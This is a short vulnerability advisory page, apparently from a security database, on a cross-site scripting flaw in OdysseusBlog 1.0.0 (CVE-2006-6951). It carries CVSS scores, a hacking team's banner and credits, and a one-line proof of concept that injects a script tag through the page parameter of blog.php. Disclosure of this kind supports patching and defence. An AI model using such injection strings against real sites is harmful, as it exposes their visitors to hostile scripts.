Bug: OdysseusBlog => 1.0.0 Cross Site Scripting ( Ascii Version )

Search:
WLB2

OdysseusBlog => 1.0.0 Cross Site Scripting

Published
Credit
Risk
2007.01.24
the_Edit0r
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2006-6951
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

""""""""""""""""""""
""""""""""""""""""""
"""""""
""" :: :: ::::: :::: """
""" :: :: :: : :: """
""" :::: :: :: ::::: ::::: :::: """
""" :: :: ::: ::: :: :: :: :: :: """
""" :: :: :: : : ::::: :: :: :::: """
""" """
""""""""""""""""""""
""""""""""""""""""""
"""""""
Xmor$ DigitaL Hacking TeaM

# OdysseusBlog => 1.0.0 Cross Site Scripting
# Script.............. : OdysseusBlog
# Discovered by.... : the_Edit0r
# Location .......... : Iran
# Class.............. : Xss
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r
# D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
# ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
# Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

# proof Of Concept :
# Www.SiteName.coM/[path]/blog.php?page="><script>alert('Xmors')</script><

#Contact me : the_3dit0r[at]Yahoo[dot]coM

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version